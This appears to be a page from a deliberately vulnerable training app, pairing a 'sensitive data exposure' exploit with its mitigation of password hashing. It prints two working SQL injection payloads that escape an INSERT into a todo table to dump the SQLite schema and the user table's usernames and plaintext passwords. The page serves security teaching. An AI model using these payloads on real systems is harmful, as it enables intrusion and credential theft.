Exploit & Mitigation
Sensitive data exposure

Exploit Exfiltrate passwords from the system

Mitigation Ensure passwords are properly hashed

Write Up | Video

Dump schema
===== Start Schema Dump =====', 0, '1'); INSERT INTO todo (task_description, task_complete, user_id) SELECT sql, 1, 1 FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'; --

Dump user accounts
===== Start User Account Dump =====', 0, '1'); INSERT INTO todo (task_description, task_complete, user_id) SELECT GROUP_CONCAT(row, '\n'), 1, 1 FROM (SELECT id || ',' || username || ',' || password_plaintext as row FROM user); --